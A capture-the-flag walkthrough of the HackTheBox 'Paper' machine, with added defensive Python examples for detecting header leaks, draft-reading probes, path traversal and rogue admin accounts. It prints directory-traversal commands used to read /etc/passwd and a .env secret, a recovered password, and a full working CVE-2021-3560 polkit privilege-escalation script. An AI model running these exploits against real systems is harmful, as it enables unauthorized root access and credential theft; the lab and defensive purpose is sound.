Getting started with HackTheBox

Connecting to the HackTheBox lab

Environment: Kali
Register and log in to the HackTheBox platform. At this point we are not yet connected to their lab network, so we need to download their VPN profile and connect with it.

Choose Machines -> OpenVPN -> Download VPN and save the profile locally.
Connect to the VPN:

sudo openvpn lab_name.ovpn

We are now connected to the lab environment, so pick a machine you like and start hacking!

Paper

Here I chose the Paper machine; its assigned IP is 10.10.11.143.

Information gathering

Run nmap in the background for information gathering

sudo nmap -sS -sU 10.10.11.143

-sS: SYN (half-open) scan
-sU: UDP scan
-Pn: treat the specified hosts as up and skip host discovery; used to get past firewalls that block probes (not used in the command above)

Meanwhile, scan for directories with dirb; nothing was found.

dirb 10.10.11.143

Visiting the URL shows the default nginx page, with nothing special on it.
Inspecting the response in the browser developer tools (F12) reveals a header X-Backend-Server: office.paper.
That hostname cannot be reached directly, so add it to /etc/hosts and try again.
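The header that gave away the backend hostname is exactly the kind of thing a hardening review should strip from responses. The following is an added example, not code from this write-up or from HackTheBox: it parses a raw HTTP response header block, lists the disclosure headers present and extracts any hostname they reveal that differs from the host that was requested. SAMPLE_RESPONSE is constructed for the example; its header values echo those shown on this page.

```python
"""Report HTTP response headers that disclose backend details.

Added example; it is not code from the write-up or from HackTheBox. It
parses a raw response header block, lists the headers a hardening review
would strip, and extracts any hostname they reveal that differs from the
host that was requested. SAMPLE_RESPONSE is constructed.
"""
import re

# Header names that commonly reveal software versions or internal naming.
DISCLOSURE_HEADERS = {"server", "x-powered-by", "x-backend-server",
                      "x-aspnet-version", "x-generator", "via"}

# A dotted name whose last label is alphabetic, so '7.2.24' is not taken for a host.
HOSTNAME_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


def parse_headers(raw):
    """Parse a status line plus headers into a dict keyed by lower-cased name."""
    headers = {}
    lines = raw.replace("\r\n", "\n").strip().split("\n")
    for line in lines[1:]:          # lines[0] is the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def find_disclosures(raw, requested_host):
    """Map each disclosure header to its value and the foreign hostnames it leaks."""
    findings = {}
    for name, value in parse_headers(raw).items():
        if name not in DISCLOSURE_HEADERS:
            continue
        hosts = [h for h in HOSTNAME_RE.findall(value)
                 if h.lower() != requested_host.lower()]
        findings[name] = {"value": value, "other_hosts": hosts}
    return findings


# Constructed response; the Server, X-Powered-By and X-Backend-Server values
# mirror the ones observed on the target.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 28 Feb 2022 13:22:04 GMT\r\n"
    "Server: nginx\r\n"
    "X-Powered-By: PHP/7.2.24\r\n"
    "X-Backend-Server: office.paper\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, info in find_disclosures(SAMPLE_RESPONSE, "10.10.11.143").items():
        print(f"{name}: {info['value']!r} leaks hosts {info['other_hosts']}")
```

Run against the constructed response with the IP as the requested host, it reports three disclosure headers and singles out office.paper as a hostname the client was never told about; requesting by that hostname instead yields no foreign host, which is the check to run on your own edge after removing such headers.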
It turns out to be a WordPress site, so scan it further with wpscan.

wpscan --url http://office.paper

┌──(knan㉿Attack)-[~]
└─$ wpscan --url http://office.paper                                                                                       1 ⨯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.10
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://office.paper/ [10.10.11.143]
[+] Started: Mon Feb 28 21:22:04 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
 |  - X-Powered-By: PHP/7.2.24
 |  - X-Backend-Server: office.paper
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://office.paper/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
 |  - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: construction-techup
 | Location: http://office.paper/wp-content/themes/construction-techup/
 | Last Updated: 2021-07-17T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
 | Style Name: Construction Techup
 | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
 | Author: wptexture
 | Author URI: https://testerwp.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:07 <================================================> (137 / 137) 100.00% Time: 00:00:07

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Feb 28 21:22:26 2022
[+] Requests Done: 167
[+] Cached Requests: 5
[+] Data Sent: 37.027 KB
[+] Data Received: 167.529 KB
[+] Memory used: 228.91 MB
[+] Elapsed time: 00:00:21

This identifies the WordPress version as 5.2.3.

Exploitation

Searching for WordPress < 5.2.3 vulnerabilities turns up an article explaining the mechanism.
Link: Analysis of the WordPress 5.2.3 unauthorized page view vulnerability (CVE-2019-17671)
Requesting the corresponding URL, http://office.paper/?static=1&order=asc, returns a 404, but there is still hope.
From the article we learn that the function forsearch iterates over the $public_query_vars array and reads the value of each such parameter from the URL. The original article had removed the kumamon parameter from http://127.0.0.1/wordpress/?static=0&order=asc&kumamon=test; perhaps the author removed one more parameter here as well.
Try removing the order=asc parameter and request http://office.paper/?static=1 instead: this successfully returns a post.
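The request that exposed the draft leaves a recognisable trace in the web server's access log, and so does the earlier attempt that got a 404. The following is an added example, not code from this write-up or from the linked article: rather than reproducing WordPress's query parsing, it scans access-log lines in the common combined format and flags every GET/HEAD whose query string sets the WordPress 'static' public query var, regardless of response status, so that draft-reading probes can be spotted even after the site is patched. The log lines are constructed for the example; the client addresses come from the 203.0.113.0/24 documentation range.

```python
"""Flag access-log requests that use the query-var pattern behind CVE-2019-17671.

Added example; not code from the write-up or the article it links. It scans
combined-format access-log lines and reports every GET/HEAD whose query
string sets the WordPress 'static' public query var. SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_combined(line):
    """Return the request fields of a combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def sets_static_query_var(target):
    """True when the request target's query string sets the 'static' query var (any value)."""
    query = urlsplit(target).query
    return "static" in parse_qs(query, keep_blank_values=True)


def find_draft_probes(lines):
    """Return (client_ip, target, status) for every GET/HEAD that sets 'static'."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None or rec["method"] not in ("GET", "HEAD"):
            continue
        if sets_static_query_var(rec["target"]):
            hits.append((rec["ip"], rec["target"], rec["status"]))
    return hits


# Constructed sample log: the two probe requests from the write-up, a
# static=0 variant, ordinary traffic, and a line that is not a record at all.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Feb/2022:21:30:01 +0000] "GET /?static=1&order=asc HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [28/Feb/2022:21:30:10 +0000] "GET /?static=1 HTTP/1.1" 200 8412 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [28/Feb/2022:21:31:00 +0000] "GET /index.php/feed/ HTTP/1.1" 200 2311 "-" "curl/7.81.0"',
    '203.0.113.9 - - [28/Feb/2022:21:31:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "curl/7.81.0"',
    '203.0.113.9 - - [28/Feb/2022:21:31:09 +0000] "GET /?p=12&static=0 HTTP/1.1" 200 5120 "-" "curl/7.81.0"',
    'this line is not an access-log record',
]

if __name__ == "__main__":
    for ip, target, status in find_draft_probes(SAMPLE_LOG):
        print(f"{ip} requested {target} -> {status}")
```

The 404 from the first attempt is flagged as well as the successful read: on a patched site the probe no longer returns a draft, but a client sending it is still worth knowing about. Requests with static=0 are reported too, since the article the write-up cites used that form.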

test

Micheal please remove the secret from drafts for gods sake!

Hello employees of Blunder Tiffin,

Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.

So, I kindly request you all to take your discussions from the public blog to a more private chat system.

-Nick

# Warning for Michael

Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick

Threat Level Midnight

A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT

[INT:DAY]

Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….

# Secret Registration URL of new Employee chat system

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.

# Also, stop looking at my drafts. Jeez!

We notice this URL: http://chat.office.paper/register/8qozr226AhkCHZdyY
Throw that hostname into /etc/hosts as well and visit the page.
There is no obvious way in, but the page lets us register an account, so we register and log in.
Once logged in, a group chat is shown automatically; click into it to read the messages.
Scrolling back through the history shows that the chat bot can be sent a message such as "recyclops help".
The group chat is read-only and other users cannot be interacted with, so we open a direct message with the bot Recyclops:

 Hello. I am Recyclops. A bot assigned by Dwight. I will have my revenge on earthlings, but before that, I have to help my Cool friend Dwight to respond to the annoying questions asked by his co-workers, so that he may use his valuable time to... well, not interact with his co-workers.
Most frequently asked questions include:
- What time is it?
- What new files are in your sale directory?
- Why did the salesman crossed the road?
- What's the content of file x in your sales directory? etc.
Please note that I am a beta version and I still have some bugs to be fixed.
How to use me ? :
1. Small Talk:
You can ask me how dwight's weekend was, or did he watched the game last night etc.
eg: 'recyclops how was your weekend?' or 'recyclops did you watched the game last night?' or 'recyclops what kind of bear is the best?
2. Joke:
You can ask me Why the salesman crossed the road.
eg: 'recyclops why did the salesman crossed the road?'
<=====The following two features are for those boneheads, who still don't know how to use scp. I'm Looking at you Kevin.=====>
For security reasons, the access is limited to the Sales folder.
3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file sale/secret.xls' or just 'recyclops file test.txt'
4. List:
You can ask me to list the files
eg: 'recyclops i need directory list sale' or just 'recyclops list sale'
5. Time:
You can ask me what the time is
eg: 'recyclops what time is it?' or just 'recyclops time'
That's what I am capable of doing right now.
Also, Dwight is a cool guy and not a Time Thief!

Points 3 and 4 are the important ones.

3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file sale/secret.xls' or just 'recyclops file test.txt'
4. List:
You can ask me to list the files
eg: 'recyclops i need directory list sale' or just 'recyclops list sale'

Try it out (just playing): recyclops file test.txt
Try directory traversal: the contents of /etc/passwd are retrieved successfully.

 <!=====Contents of file ../../../../../etc/passwd=====>
root:0:0:root:/root:/bin/bash
bin:1:1:bin:/bin:/sbin/nologin
daemon:2:2:daemon:/sbin:/sbin/nologin
adm:3:4:adm:/var/adm:/sbin/nologin
lp:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:5:0:sync:/sbin:/bin/sync
shutdown:6:0:shutdown:/sbin:/sbin/shutdown
halt:7:0:halt:/sbin:/sbin/halt
mail:8:12:mail:/var/spool/mail:/sbin/nologin
operator:11:0:operator:/root:/sbin/nologin
games:12:games:/usr/games:/sbin/nologin
ftp:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus:81:81:System message bus:/:/sbin/nologin
systemd-coredump:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:193:193:systemd Resolver:/:/sbin/nologin
tss:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd:998:996:User for polkitd:/:/sbin/nologin
geoclue:997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
rtkit:172:172:RealtimeKit:/proc:/sbin/nologin
qemu:107:107:qemu user:/:/sbin/nologin
apache:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws:996:993:User for cockpit-ws:/:/sbin/nologin
pulse:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd:113:113:usbmuxd user:/:/sbin/nologin
unbound:995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony:993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt:992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq:985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd:75:75:radvd user:/:/sbin/nologin
clevis:984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd:983:981:User for sssd:/:/sbin/nologin
colord:982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot:981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire:980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup:979:977::/run/gnome-initial-setup/:/sbin/nologin
insights:978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump:72:72::/:/sbin/nologin
mysql:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod:976:974:mongod:/var/lib/mongo:/bin/false
rocketchat:1001:1001::/home/rocketchat:/bin/bash
dwight:1004:1004::/home/dwight:/bin/bash
<!=====End of file ../../../../../etc/passwd=====>

Having read passwd with file, we try list to gather more:
recyclops list
The current directory is empty, so look at the other subdirectories under the parent. The .env file in the ../hubot directory contains something valuable.
recyclops list ../hubot
recyclops file ../hubot/.env
The password obtained is:
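The bot said access was limited to the sales folder, yet both its file and list commands accepted ../ and handed over /etc/passwd and a .env file two directories up. The following is an added example, not the bot's own code (which is not on this page): read_file_vulnerable joins the requested name onto the base folder the way the bot evidently did, while the hardened functions resolve the path, require the result to stay under the base folder (which also catches a symlink pointing out of it) and refuse dotfiles such as .env. build_demo_tree creates a constructed directory layout in a temporary directory, so the whole thing runs offline.

```python
"""A 'sales folder' file service: the traversal bug beside a confined version.

Added example; the bot's real code is not on the page and this is not it.
read_file_vulnerable trusts the requested name; _confine resolves the path,
checks containment under the base folder and refuses dotfiles.
build_demo_tree lays out a constructed tree in a temporary directory.
"""
import os
import shutil
import tempfile


class AccessDenied(Exception):
    pass


def read_file_vulnerable(base_dir, requested):
    """Serve base_dir/requested with no check: '../' walks straight out of base_dir."""
    with open(os.path.join(base_dir, requested)) as f:
        return f.read()


def _confine(base_dir, requested):
    """Resolve requested inside base_dir; raise AccessDenied if it would escape."""
    base = os.path.realpath(base_dir)
    if os.path.isabs(requested):
        raise AccessDenied("absolute paths are not allowed")
    # realpath collapses '..' and follows symlinks before the containment check.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise AccessDenied("path escapes the base folder")
    rel = os.path.relpath(candidate, base)
    if rel != "." and any(part.startswith(".") for part in rel.split(os.sep)):
        raise AccessDenied("dotfiles are not served")
    return candidate


def read_file_hardened(base_dir, requested):
    path = _confine(base_dir, requested)
    if not os.path.isfile(path):
        raise FileNotFoundError(requested)
    with open(path) as f:
        return f.read()


def list_dir_hardened(base_dir, requested="."):
    path = _confine(base_dir, requested)
    if not os.path.isdir(path):
        raise FileNotFoundError(requested)
    return sorted(name for name in os.listdir(path) if not name.startswith("."))


def build_demo_tree():
    """Constructed layout: <root>/sales/test.txt, <root>/hubot/.env, sales/link -> hubot."""
    root = tempfile.mkdtemp(prefix="sales-demo-")
    sales, hubot = os.path.join(root, "sales"), os.path.join(root, "hubot")
    os.makedirs(sales)
    os.makedirs(hubot)
    with open(os.path.join(sales, "test.txt"), "w") as f:
        f.write("quarterly numbers\n")
    with open(os.path.join(hubot, ".env"), "w") as f:
        f.write("BOT_PASSWORD=constructed-placeholder\n")   # constructed, not the real secret
    os.symlink(hubot, os.path.join(sales, "link"))
    return root, sales


def demo():
    """Exercise both versions against the constructed tree and return what each did."""
    root, sales = build_demo_tree()
    try:
        results = {"vulnerable_env": read_file_vulnerable(sales, "../hubot/.env")}
        for name in ("../hubot/.env", "link/.env", "/etc/passwd", "../../../../../etc/passwd"):
            try:
                read_file_hardened(sales, name)
                results[name] = "served"
            except AccessDenied as exc:
                results[name] = f"denied: {exc}"
        results["test.txt"] = read_file_hardened(sales, "test.txt")
        results["listing"] = list_dir_hardened(sales)
        return results
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r}: {value!r}")
```

The containment check is done on the resolved path, not on the string the user typed: a name with no ../ in it at all ("link/.env") still ends up outside the folder via the symlink, and only realpath followed by commonpath catches that. The dotfile rule is a separate layer, since a .env legitimately inside the served folder would be just as damaging to hand out.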

Queenofblad3s!23

Using this password together with a username from /etc/passwd, we try logging in over SSH, and it works!
User-level access obtained.

Privilege escalation

Linux privilege escalation lab
Privilege escalation with CVE-2021-3560
Here CVE-2021-3560 is used to escalate privileges.

import os
import sys
import time
import subprocess
import random
import pwd

print ("**************")
print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
print("Exploit code written by Ahmad Almorabea @almorabea")
print("Original exploit author: Kevin Backhouse ")
print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
print ("**************")
print("[+] Starting the Exploit ")
time.sleep(3)

check = True
counter = 0
while check:
        counter = counter +1
        process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:ahmed','string:"Ahmad Almorabea','int32:1'])
        try:
                #print('1 - Running in process', process.pid)
                Random = random.uniform(0.006,0.009)
                process.wait(timeout=Random)
                process.kill()
        except subprocess.TimeoutExpired:
                #print('Timed out - killing', process.pid)
                process.kill()

        user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8')
        if user.find("uid") != -1:
                print("[+] User Created with the name of ahmed")
                print("[+] Timed out at: "+str(Random))
                check =False
                break
        if counter > 2000:
                print("[-] Couldn't add the user, try again it may work")
                sys.exit(0)

for i in range(200):
        #print(i)
        uid = "/org/freedesktop/Accounts/User"+str(pwd.getpwnam('ahmed').pw_uid)

        #In case you need to put a password un-comment the code below and put your password after string:yourpassword'
        password = "string:"
        #res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8')
        #password = f"string:{res.rstrip()}"

        process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply',uid,'org.freedesktop.Accounts.User.SetPassword',password,'string:GoldenEye'])
        try:
                #print('1 - Running in process', process.pid)
                Random = random.uniform(0.006,0.009)
                process.wait(timeout=Random)
                process.kill()
        except subprocess.TimeoutExpired:
                #print('Timed out - killing', process.pid)
                process.kill()

print("[+] Timed out at: " + str(Random))
print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ")

p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)

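The escalation above does not exploit a memory bug; it gets a system service to create a new local user and hand it administrative rights, and that activity is logged like any other account change. The following is an added example, not part of this write-up or of the exploit: it scans /var/log/secure-style lines for the useradd "new user" record and the usermod "add 'x' to group 'y'" record (the message formats shadow-utils writes; the assumption here is that accounts are created and promoted through those tools), reports every account creation and every grant into an administrative group, and marks grants that landed on an account created moments earlier. The sample lines are constructed; the year must be supplied because the syslog timestamp omits it.

```python
"""Spot local-account creation and admin-group grants in auth logs.

Added example; not part of the write-up or the exploit. It parses the
shadow-utils 'new user' and "add 'x' to group 'y'" messages from
/var/log/secure-style lines and flags admin-group grants on accounts
created within a short window. SAMPLE_SECURE_LOG is constructed.
"""
import re
from datetime import datetime

TS_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) ")
NEW_USER_RE = re.compile(r"useradd\[\d+\]: new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+)")
GROUP_ADD_RE = re.compile(r"usermod\[\d+\]: add '(?P<name>[^']+)' to group '(?P<group>[^']+)'")
ADMIN_GROUPS = {"wheel", "sudo", "admin", "root"}


def parse_syslog_ts(line, year):
    """Turn the leading 'Mon DD HH:MM:SS' into a datetime; syslog omits the year."""
    m = TS_RE.match(line)
    if not m:
        return None
    return datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")


def find_account_events(lines, year, window_seconds=60):
    """Return user_created and admin_group_added events in log order.

    An admin_group_added event carries fresh_account=True when the same
    account was created at most window_seconds earlier in the scanned lines.
    """
    created = {}
    events = []
    for line in lines:
        ts = parse_syslog_ts(line, year)
        m = NEW_USER_RE.search(line)
        if m:
            created[m["name"]] = ts
            events.append({"event": "user_created", "name": m["name"],
                           "uid": int(m["uid"]), "time": ts})
            continue
        m = GROUP_ADD_RE.search(line)
        if m and m["group"] in ADMIN_GROUPS:
            fresh = False
            if m["name"] in created and ts and created[m["name"]]:
                delta = (ts - created[m["name"]]).total_seconds()
                fresh = 0 <= delta <= window_seconds
            events.append({"event": "admin_group_added", "name": m["name"],
                           "group": m["group"], "time": ts, "fresh_account": fresh})
    return events


def fresh_admin_accounts(events):
    """Accounts promoted to an admin group right after creation: the pattern to alert on."""
    return sorted({e["name"] for e in events
                   if e["event"] == "admin_group_added" and e["fresh_account"]})


# Constructed /var/log/secure excerpt: a routine group change in the morning,
# then an account created and promoted within the same second at night.
SAMPLE_SECURE_LOG = [
    "Feb 28 09:00:12 paper usermod[2210]: add 'dwight' to group 'wheel'",
    "Feb 28 22:10:41 paper useradd[5102]: new group: name=ahmed, GID=1005",
    "Feb 28 22:10:41 paper useradd[5102]: new user: name=ahmed, UID=1005, GID=1005, home=/home/ahmed, shell=/bin/bash",
    "Feb 28 22:10:41 paper usermod[5110]: add 'ahmed' to group 'wheel'",
    "Feb 28 22:11:03 paper sshd[4870]: Accepted password for dwight from 203.0.113.7 port 51234 ssh2",
]

if __name__ == "__main__":
    evts = find_account_events(SAMPLE_SECURE_LOG, 2022)
    for e in evts:
        print(e)
    print("fresh admin accounts:", fresh_admin_accounts(evts))
```

Any account creation on a server that is not supposed to provision users interactively is worth a look, but the creation-then-promotion pair inside one minute is the strong signal; the morning grant to an existing account is reported without that flag, so the two cases can be routed differently.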
Change into /root, where the root.txt file holds the flag we are after.

Summary

Honestly, for this last privilege escalation step I do not know why this particular exploit is used; I was following a more experienced player's walkthrough. His run had a linpeas.sh file, but my reproduction did not. On top of that the connection was too slow: I could not stay connected, got dropped after typing two commands, and was stuck at this point. After escalating, the flag should be visible. Since some target environments have no python3, you can also try the approach in "CVE-2021-3560 privilege escalation" (https://blog.csdn.net/qq_35208730/article/details/118683245).
